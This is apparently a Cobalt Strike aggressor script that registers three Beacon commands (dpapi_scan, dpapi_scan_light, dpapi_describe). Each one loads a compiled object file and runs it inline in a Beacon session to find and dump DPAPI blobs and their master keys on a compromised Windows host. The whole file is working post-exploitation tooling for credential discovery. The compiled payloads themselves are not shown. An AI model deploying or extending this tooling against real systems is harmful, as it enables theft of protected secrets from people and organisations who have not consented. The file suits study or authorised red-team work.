# Register the three DPAPI commands in the Beacon console.
# Each entry is (command name, help text, usage line); the strings are
# passed through to beacon_command_register unchanged.
foreach $dpapi_cmd (@(
    @("dpapi_scan",
      "Scans a directory for DPAPI blobs and locates associated Master Keys, with the option to dump hex-formatted bytes or output data in CSV format.",
      "Usage: dpapi_scan /path:C:\\path\\to\\folder\\* [/dump:true|false] [/csv:true|false]"),
    @("dpapi_scan_light",
      "Scans a directory for DPAPI blobs and locates associated Master Keys. No frills.",
      "Usage: dpapi_scan_light /path:C:\\path\\to\\folder\\*"),
    @("dpapi_describe",
      "Parses a specific DPAPI blob and dumps all structure fields, with the option to dump hex-formatted bytes.",
      "Usage: dpapi_describe /path:C:\\path\\to\\file [/dump:true|false]")
)) {
    beacon_command_register($dpapi_cmd[0], $dpapi_cmd[1], $dpapi_cmd[2]);
}
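# dpapi_scan: parse "/key:value" arguments, load the compiled BOF that sits
# next to this script (dpapi-bof-scan.o) and run it inline in Beacon $1.
#
# Arguments (each "/key:value", split on the first colon only):
#   /path  - required; directory pattern handed to the BOF
#   /dump  - optional; "true" (case-insensitive) sets the dump flag to 1
#   /csv   - optional; "true" (case-insensitive) sets the csv flag to 1
# Unknown keys and arguments without a colon are ignored.
# Arguments are packed as "zii": null-terminated string, int, int.
alias dpapi_scan {
    # $i, $arg and $parts are declared here so the loop does not leak globals.
    local('$bid $path_val $dump_val $dump_opt $csv_val $csv_opt $key $val $args $data $handle $i $arg $parts $bof');
    # $1 is the Beacon ID
    $bid = $1;

    # Defaults: no path, both flags off.
    $path_val = $null;
    $dump_val = $null;
    $dump_opt = 0;
    $csv_val = $null;
    $csv_opt = 0;

    # Parse arguments with split(); the original author abandoned a regex
    # because of inconsistent results.
    for ($i = 1; $i < size(@_); $i++) {
        $arg = @_[$i];
        # Split on the first colon only so the value may itself contain colons
        # (drive letters such as C:\...).
        $parts = split(':', $arg, 2);
        if (size($parts) == 2) {
            $key = $parts[0];
            $val = $parts[1];
            if ($key eq "/path") {
                $path_val = $val;
            }
            else if ($key eq "/dump") {
                $dump_val = $val;
            }
            else if ($key eq "/csv") {
                $csv_val = $val;
            }
        }
    }

    if ($path_val is $null) {
        berror($bid, "Please specify a path. Example: dpapi_scan /path:C:\\path\\to\\folder\\* [/dump:true|false] [/csv:true|false]");
        return;
    }
    # Only the literal "true" (any case) turns a flag on; anything else is off.
    if (lc($dump_val) eq "true") { $dump_opt = 1; }
    if (lc($csv_val) eq "true") { $csv_opt = 1; }

    # Locate the compiled BOF; it must be in the same directory as this script.
    # Fail early with a console error instead of reading an invalid handle and
    # sending empty data to the Beacon.
    $bof = script_resource("dpapi-bof-scan.o");
    if (!-exists $bof) {
        berror($bid, "Could not find $bof - place it in the same directory as this script");
        return;
    }
    $handle = openf($bof);
    $data = readb($handle, -1);
    closef($handle);

    # Pack the arguments: 'z' null-terminated string, 'i' integer, 'i' integer.
    $args = bof_pack($bid, "zii", $path_val, $dump_opt, $csv_opt);

    # Log the action and execute
    btask($bid, "Running DPAPI Scan with: $path_val");
    beacon_inline_execute($bid, $data, "go", $args);
}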
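# dpapi_scan_light: parse "/key:value" arguments, load the compiled BOF that
# sits next to this script (dpapi-bof-scan-light.o) and run it inline in
# Beacon $1.
#
# Arguments (each "/key:value", split on the first colon only):
#   /path  - required; directory pattern handed to the BOF
# Unknown keys and arguments without a colon are ignored.
# The single argument is packed as "z": null-terminated string.
alias dpapi_scan_light {
    # $i, $arg and $parts are declared here so the loop does not leak globals.
    local('$bid $path_val $key $val $args $data $handle $i $arg $parts $bof');
    # $1 is the Beacon ID
    $bid = $1;

    # Default: no path.
    $path_val = $null;

    # Parse arguments with split(); the original author abandoned a regex
    # because of inconsistent results.
    for ($i = 1; $i < size(@_); $i++) {
        $arg = @_[$i];
        # Split on the first colon only so the value may itself contain colons
        # (drive letters such as C:\...).
        $parts = split(':', $arg, 2);
        if (size($parts) == 2) {
            $key = $parts[0];
            $val = $parts[1];
            if ($key eq "/path") {
                $path_val = $val;
            }
        }
    }

    if ($path_val is $null) {
        berror($bid, "Please specify a path. Example: dpapi_scan_light /path:C:\\path\\to\\folder\\*");
        return;
    }

    # Locate the compiled BOF; it must be in the same directory as this script.
    # Fail early with a console error instead of reading an invalid handle and
    # sending empty data to the Beacon.
    $bof = script_resource("dpapi-bof-scan-light.o");
    if (!-exists $bof) {
        berror($bid, "Could not find $bof - place it in the same directory as this script");
        return;
    }
    $handle = openf($bof);
    $data = readb($handle, -1);
    closef($handle);

    # Pack the argument: 'z' null-terminated string.
    $args = bof_pack($bid, "z", $path_val);

    # Log the action and execute
    btask($bid, "Running DPAPI Scan Light with: $path_val");
    beacon_inline_execute($bid, $data, "go", $args);
}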
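# dpapi_describe: parse "/key:value" arguments, load the compiled BOF that
# sits next to this script (dpapi-bof-describe.o) and run it inline in
# Beacon $1.
#
# Arguments (each "/key:value", split on the first colon only):
#   /path  - required; file path handed to the BOF
#   /dump  - optional; "true" (case-insensitive) sets the dump flag to 1
# Unknown keys and arguments without a colon are ignored.
# Arguments are packed as "zi": null-terminated string, int.
alias dpapi_describe {
    # $i, $arg and $parts are declared here so the loop does not leak globals.
    local('$bid $path_val $dump_val $dump_opt $key $val $args $data $handle $i $arg $parts $bof');
    # $1 is the Beacon ID
    $bid = $1;

    # Defaults: no path, dump flag off. $dump_val starts as $null to match the
    # other aliases; lc($null) never equals "true", so the flag stays 0.
    $path_val = $null;
    $dump_val = $null;
    $dump_opt = 0;

    # Parse arguments with split(); the original author abandoned a regex
    # because of inconsistent results.
    for ($i = 1; $i < size(@_); $i++) {
        $arg = @_[$i];
        # Split on the first colon only so the value may itself contain colons
        # (drive letters such as C:\...).
        $parts = split(':', $arg, 2);
        if (size($parts) == 2) {
            $key = $parts[0];
            $val = $parts[1];
            if ($key eq "/path") {
                $path_val = $val;
            }
            else if ($key eq "/dump") {
                $dump_val = $val;
            }
        }
    }

    if ($path_val is $null) {
        berror($bid, "Please specify a path. Example: dpapi_describe /path:C:\\Users\\Name\\Desktop\\secret.out [/dump:true|false]");
        return;
    }
    # Only the literal "true" (any case) turns the flag on; anything else is off.
    if (lc($dump_val) eq "true") { $dump_opt = 1; }

    # Locate the compiled BOF; it must be in the same directory as this script.
    # Fail early with a console error instead of reading an invalid handle and
    # sending empty data to the Beacon.
    $bof = script_resource("dpapi-bof-describe.o");
    if (!-exists $bof) {
        berror($bid, "Could not find $bof - place it in the same directory as this script");
        return;
    }
    $handle = openf($bof);
    $data = readb($handle, -1);
    closef($handle);

    # Pack the arguments: 'z' null-terminated string, 'i' integer.
    $args = bof_pack($bid, "zi", $path_val, $dump_opt);

    # Log the action and execute
    btask($bid, "Running DPAPI Describe with: $path_val");
    beacon_inline_execute($bid, $data, "go", $args);
}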